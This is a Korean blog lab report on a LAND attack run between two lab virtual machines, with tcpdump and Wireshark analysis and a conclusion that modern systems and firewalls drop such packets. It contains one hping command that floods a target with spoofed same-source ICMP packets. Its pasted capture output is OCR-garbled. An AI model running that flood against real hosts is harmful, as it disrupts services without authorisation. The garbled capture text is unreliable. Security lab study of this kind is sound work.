2020. 7. 16.

[Network] land 응답 오는지 확인


    1. 구성과 계획
    • 네트워크 구성도
    피해자  att7 - 192.168.10.150/00:0c:29:a1:3f:e0
    공격자 att5 - 192.168.10.148/00:0C:29:5D:87:05

    • 과정 정리
    step1. att7 tcpdump 캡쳐
    step2. att5 hping 공격 실행
    step3. wireshark 캡쳐본 분석

    1. 관련내용정리
    land attack : 패킷을 전송할 출발지 IP 주소와 목적지 주소값을 똑같이 만들어 공격대상에게 보냄으로써 공격대상이 계속 자기에게 패킷을 보낸다.

    1. 실습과정
    step1. att7 tcpdump 캡쳐
    tcpdump -xX -w teardrop.cap -i ens32
    step2. att5 hping 공격 실행
    hping 192.168.10.150 -a 192.168.10.150 --icmp --flood
    step4. wireshark 캡쳐본 분석
    wireshark on
    • filtering : ip.addr == 192.168.10.150
    192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 192. 168.10. 150 ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP 60 60 60 60 60 60 60 60 Echo Echo Echo Echo Echo Echo Echo Echo pequest pequest pequest pequest pequest pequest pequest pequest id=ax9612, id=ax9612, id=ax9612, id=ax9612, id=ax9612, id=ax9612, id=ax9612, id=ax9612, seq= seq= seq= seq= seq= seq= seq= seq= 1308/7173, 1564/7174, 1820/7175, 2076/7176, 2332/7177, 2588/7178, 2844/7179, 3100/7180, tt1 tt1 tt1 tt1 tt1 tt1 tt1 tt1 ηαςροηςα ηαςροηςα ηαςροηςα ηαςροηςα ηαςροηςα ηαςροηςα ηαςροηςα ηαςροηςα found!) found!) found!) found!) found!) found!) found!) found!)
    같은 아이피로 요청만 가고 reply 안온다.
    이것도 맥주소를 확인하면 구분이 가능하다.
    00 1c bc 40 01 96 οο οο 000000000000 οο οο 6d 00 12 27 +4 08 αο 45 αο οο αο οο οο οο οο
    도착지인 00:0c:29:a1:3f:e0 192.168.10.150 MAC 주소이다.
    하지만 출발지인 00:0c:29:5d:87:05 192.168.10.148 MAC 주소이다.

    1. 결론
    현재 시스템은 대부분 효과가 없다.
    라우터나 방화벽에서 출발지 IP 내부 IP 주소가 동일한 패킷은 차단
    시스템에서 출발지와 목적지가 같은 패킷은 자동으로 버린다.

시간:
라벨: ,

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)